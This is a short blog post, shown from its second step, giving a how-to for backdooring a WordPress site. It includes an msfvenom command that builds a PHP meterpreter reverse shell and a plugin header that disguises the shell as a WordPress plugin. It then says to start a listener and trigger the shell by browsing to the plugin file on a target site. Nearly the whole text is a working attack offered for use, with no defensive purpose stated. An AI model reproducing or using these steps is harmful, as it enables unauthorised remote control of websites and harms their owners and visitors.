2. Create a php reverse shell using msfvenom and name the file shell.php:
msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw > shell.php
3. Add comments on the top of the shell.php to make it a valid plugin and compress it in zip format
<?php
/*
* Plugin Name: My Shell
* Plugin URI: https://github.com/r0rshark/wordpress-shell
* Description: Execute Commands as the webserver you are serving wordpress with
* Author: r0rshark
* Version: 0.2
* Author URI: https://r0rshark.github.io
*/ 4.Setup a listener at your ip and port used in the msfvenom
5.Execute the reverse shell by visiting www.target.com/wp-content/plugins/shell/shell.php
Source: https://r0rshark.github.io/2015/07/30/google/
Fuente: http://www.r00tsec.com/2015/08/howto-create-backdoor-in-wordpress.html
No hay comentarios:
Publicar un comentario